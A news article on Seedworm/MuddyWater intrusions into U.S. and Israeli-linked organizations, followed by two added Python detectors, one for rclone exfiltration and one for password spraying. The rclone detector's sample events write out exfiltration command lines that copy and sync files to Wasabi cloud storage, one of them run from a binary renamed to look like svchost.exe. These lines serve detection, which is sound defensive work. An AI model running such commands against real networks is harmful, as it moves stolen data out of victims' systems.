
Iran-linked APT Attacks US Critical Sectors Using New Backdoors


Iran-Linked Hacking Group Targets U.S. Organizations Amid Rising Geopolitical Tensions

An Iranian state-linked espionage group has re-emerged, with active intrusions into several U.S. organizations observed since early February 2026. The uptick has alarmed security researchers and government officials alike, who warn that it may be a precursor to broader cyber operations as geopolitical tensions in the Middle East escalate.

Emergence of New Malware Backdoors

Researchers at Symantec and Carbon Black have attributed the intrusions to the group they track as Seedworm, better known as MuddyWater, an advanced persistent threat (APT) that Western governments have publicly attributed to Iran’s Ministry of Intelligence and Security (MOIS). The group has a long record of espionage campaigns against government agencies, telecommunications providers and critical infrastructure operators around the world.

Seedworm activity has been detected on the networks of several significant U.S. organizations, including:

  • A major U.S. bank
  • A prominent U.S. airport
  • Multiple non-profit organizations
  • The Israel-based operations of a U.S. software company that serves the defense and aerospace sectors

The Seedworm activity began in early February 2026 and has continued into recent days. In these intrusions, researchers observed the group deploying two previously undocumented backdoors:

  1. Dindoor: a backdoor built on Deno, the JavaScript and TypeScript runtime, that lets the operators run commands on compromised hosts.

  2. Fakeset: a Python-based backdoor that has likewise been linked to Seedworm.

Dindoor was code-signed with a certificate issued in the name "Amy Cherne," while Fakeset samples carried signatures in the names "Cherne" and "Donald Gay." The "Donald Gay" certificate has previously been seen on the Stagecomp and Darkcomp malware, which ties the new backdoors to earlier tooling. A valid signature from an unknown individual should not be treated as a mark of trust: signed malware passes naive "is it signed?" checks, so allow-listing should pin the specific signer identities an organization expects rather than accepting any valid signature.

The primary objective of the intrusions appears to be espionage. The attackers were observed attempting to exfiltrate data from the targeted software company to a cloud storage bucket hosted by Wasabi, using the open-source sync tool Rclone.
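Rclone is a legitimate, widely used tool, so its mere presence is not an indicator; a detection has to key on the combination of a transfer subcommand, a configured remote and a third-party object-storage endpoint, and it has to survive the binary being renamed. The Python below is an added example written for this article, not code from Symantec, Carbon Black or the report; the Sysmon-style event field names and the command lines are constructed for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# rclone subcommands that push data to a remote; "version", "lsd" etc. are not transfers
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto", "rcat"}
# flags only rclone understands; they still appear when the binary has been renamed
RCLONE_FLAGS = {"--config", "--s3-provider", "--s3-endpoint", "--transfers", "--s3-access-key-id"}
# rclone addresses a configured remote as "name:path"; a Windows drive letter is a single
# character before the colon and "https://" is excluded by the negative lookahead
REMOTE_RE = re.compile(r"^([A-Za-z][A-Za-z0-9_-]+):(?!//)\S*$")
WASABI_HOST_RE = re.compile(r"\bs3(?:\.[a-z0-9-]+)?\.wasabisys\.com\b", re.IGNORECASE)
RCLONE_NAMES = {"rclone", "rclone.exe"}

# Constructed Sysmon-style process-creation events (assumed field names, not real telemetry)
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\svc\AppData\Local\Temp\rclone.exe",
     "CommandLine": r'rclone.exe copy "C:\Projects\aero" wasabi:exfil-bkt/aero --config C:\Users\svc\rc.conf -q',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\ProgramData\svchost.exe",  # rclone renamed to look like a system binary
     "CommandLine": r"svchost.exe sync D:\share s3:backup-77 --s3-provider Wasabi --s3-endpoint s3.eu-central-1.wasabisys.com",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Program Files\rclone\rclone.exe",  # rclone present, but no transfer
     "CommandLine": r"rclone.exe version",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\svchost.exe",  # the real svchost
     "CommandLine": r"svchost.exe -k netsvcs -p",
     "ParentImage": r"C:\Windows\System32\services.exe"},
]


@dataclass
class Finding:
    image: str
    remote: str
    reasons: List[str] = field(default_factory=list)


def analyse(event: dict) -> Optional[Finding]:
    """Return a Finding if the process looks like an rclone transfer to a remote."""
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")
    tokens = cmdline.split()
    basename = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    args = tokens[1:]  # everything after argv[0]

    verb = next((t.lower() for t in args if t.lower() in TRANSFER_VERBS), None)
    remotes = [t for t in args if REMOTE_RE.match(t)]
    flags = sorted({t.split("=", 1)[0] for t in args if t.split("=", 1)[0] in RCLONE_FLAGS})

    reasons = []
    if basename in RCLONE_NAMES:
        reasons.append("image is rclone")
    if verb and remotes:
        reasons.append(f"rclone transfer syntax: {verb} -> {remotes[-1]}")
        if basename not in RCLONE_NAMES:
            reasons.append(f"binary renamed to {basename}")
    if flags:
        reasons.append("rclone-specific flags: " + ", ".join(flags))

    # Alert only on an actual transfer to a remote. "rclone version" alone is worth
    # logging for hunting but not paging on, so it is left out here; tune the verb and
    # remote checks against your own fleet to control false positives.
    if not (verb and remotes):
        return None
    remote = remotes[-1]
    host = WASABI_HOST_RE.search(cmdline)
    if host or remote.lower().startswith("wasabi"):
        reasons.append("Wasabi destination: " + (host.group(0) if host else remote))
    return Finding(image=image, remote=remote, reasons=reasons)


def scan(events) -> List[Finding]:
    return [f for f in (analyse(e) for e in events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f.image, "->", f.remote)
        for r in f.reasons:
            print("   ", r)
```

The second sample event is the one worth studying: the binary is named `svchost.exe` and lives outside `System32`, but the `sync` verb, the `s3:` remote and the `--s3-endpoint` pointing at `wasabisys.com` still give it away.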

According to the cybersecurity analysts, "While it’s not known if Seedworm’s operations are impacted by the ongoing conflicts, having already embedded themselves within U.S. and Israeli networks prior to current hostilities places the group in a precarious position to launch more aggressive cyber-attacks."

As investigations continue, it remains unclear which methods or exploits Seedworm used to gain initial access to these networks, which leaves defenders without a clear entry point to close.

Insights from Exposed VPS

Separately, the independent threat-intelligence collective Ctrl-Alt-Intel reported that it had gained access to a Seedworm-operated virtual private server (VPS) in the Netherlands and recovered command-and-control (C2) tooling, operational scripts, logs, victim data and other artifacts from it.

The recovered data pointed to a broader set of targets than the U.S. intrusions alone, including Israeli healthcare providers, government bodies in Jordan and Egypt, private companies in the United Arab Emirates, and U.S. organizations and NGOs associated with Jewish and Israeli interests.

The disclosed operational details painted a striking picture of Seedworm’s capabilities. "The exposed infrastructure provides a sweeping view of a MuddyWater operation—from initial reconnaissance to data exfiltration," noted Ctrl-Alt-Intel. "What stands out is not just the sophistication of individual tools but the extensive array of operations targeting numerous organizations."

According to the analysis, Seedworm has exploited more than a dozen Common Vulnerabilities and Exposures (CVEs), including new SQL injection flaws, and has run password-spraying campaigns against exposed logins. The group has also adopted Ethereum-based C2 resolution, in which the malware looks up its current C2 address on the Ethereum blockchain rather than relying on a hard-coded domain that can be seized, and it has built multiple exfiltration paths through cloud storage and Amazon EC2 instances.
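Password spraying differs from brute force in shape: a few attempts against many accounts rather than many attempts against one, which keeps each account under its lockout threshold and below per-account alert rules. The detection below is an added example written for this article, not the researchers' tooling; the auth-log line format is assumed and the sample lines are constructed. It separates the two patterns over a sliding window and lists the accounts the spraying source later logged into successfully, which is the first list an incident responder needs.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Iterable, List

# Constructed auth-log lines in an assumed "ts auth src= user= result=" format (not real data).
# 203.0.113.7 sprays eight accounts once each and later logs in as grace;
# 198.51.100.5 hammers one account; 192.0.2.10 is a user mistyping a password.
SAMPLE_LOG = """\
2026-02-03T09:00:00Z auth src=203.0.113.7 user=alice result=fail
2026-02-03T09:05:00Z auth src=203.0.113.7 user=bob result=fail
2026-02-03T09:10:00Z auth src=203.0.113.7 user=carol result=fail
2026-02-03T09:15:00Z auth src=203.0.113.7 user=dave result=fail
2026-02-03T09:20:00Z auth src=203.0.113.7 user=erin result=fail
2026-02-03T09:25:00Z auth src=203.0.113.7 user=frank result=fail
2026-02-03T09:30:00Z auth src=203.0.113.7 user=grace result=fail
2026-02-03T09:35:00Z auth src=203.0.113.7 user=henry result=fail
2026-02-03T09:50:00Z auth src=203.0.113.7 user=grace result=success
2026-02-03T09:00:30Z auth src=198.51.100.5 user=bob result=fail
2026-02-03T09:01:00Z auth src=198.51.100.5 user=bob result=fail
2026-02-03T09:01:30Z auth src=198.51.100.5 user=bob result=fail
2026-02-03T09:02:00Z auth src=198.51.100.5 user=bob result=fail
2026-02-03T09:02:30Z auth src=198.51.100.5 user=bob result=fail
2026-02-03T09:03:00Z auth src=198.51.100.5 user=bob result=fail
2026-02-03T09:04:00Z auth src=192.0.2.10 user=alice result=fail
2026-02-03T09:04:20Z auth src=192.0.2.10 user=alice result=fail
2026-02-03T09:04:40Z auth src=192.0.2.10 user=alice result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\w+)$"
)


@dataclass
class Event:
    ts: datetime
    src: str
    user: str
    ok: bool


@dataclass
class Finding:
    src: str
    kind: str               # "password_spray" or "brute_force"
    users: List[str]        # accounts that saw failures from this source
    compromised: List[str]  # of those, accounts the source later logged into


def parse(lines: Iterable[str]) -> List[Event]:
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # ignore lines in other formats instead of aborting the scan
        events.append(Event(datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
                            m["src"], m["user"], m["result"] == "success"))
    return sorted(events, key=lambda e: e.ts)


def detect(lines, window=timedelta(hours=1), min_users=5, max_per_user=3, brute_min=5):
    by_src = defaultdict(list)
    for e in parse(lines):
        by_src[e.src].append(e)

    findings = []
    for src, evs in by_src.items():
        # Sliding window over this source's events; keep the window with the most
        # distinct failed accounts. Quadratic in events per source, fine for a demo.
        best, start = Counter(), 0
        for end in range(len(evs)):
            while evs[end].ts - evs[start].ts > window:
                start += 1
            fails = Counter(e.user for e in evs[start:end + 1] if not e.ok)
            if (len(fails), sum(fails.values())) > (len(best), sum(best.values())):
                best = fails
        if len(best) >= min_users and max(best.values()) <= max_per_user:
            kind = "password_spray"  # many accounts, few tries each: stays under lockout
        elif len(best) == 1 and sum(best.values()) >= brute_min:
            kind = "brute_force"     # one account, many tries: what lockout rules catch
        else:
            continue
        compromised = sorted({e.user for e in evs if e.ok and e.user in best})
        findings.append(Finding(src, kind, sorted(best), compromised))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines()):
        print(f"{f.src}: {f.kind}, {len(f.users)} accounts tried, compromised={f.compromised}")
```

The thresholds are deliberately conservative; in practice `max_per_user` should sit below the directory's lockout threshold, and the source key should be widened to an ASN or user-agent when the spray is distributed across many IPs.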

“MuddyWater exhibits a notable ability to quickly integrate public exploit code, tailor it for operational use, and scale its deployment, all while concurrently developing custom tools tailored for their operations,” the group concluded.

As cybersecurity experts remain vigilant, this ongoing threat illustrates the complex landscape of cyber warfare and espionage linked to geopolitical conflicts. As the situation evolves, both U.S. and Israeli organizations must strengthen their cyber defenses to safeguard against these sophisticated operations.
